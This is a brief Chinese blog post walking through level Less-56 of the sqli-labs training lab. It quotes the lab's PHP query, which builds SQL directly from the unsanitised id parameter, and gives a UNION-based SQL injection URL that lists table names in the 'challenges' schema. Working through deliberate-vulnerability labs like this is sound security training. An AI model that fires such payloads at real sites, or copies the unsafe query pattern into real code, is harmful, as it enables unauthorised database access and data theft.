sqli-labs――――Less-56

匿名 (未验证) 提交于 2019-12-03 00:18:01

Less-56


源代码:

sql执行语句:
$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";

构建payload如下:

http://192.168.11.136/sqli-labs/Less-56?id=-1')union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+


其余的部分不再多说了哈!

标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!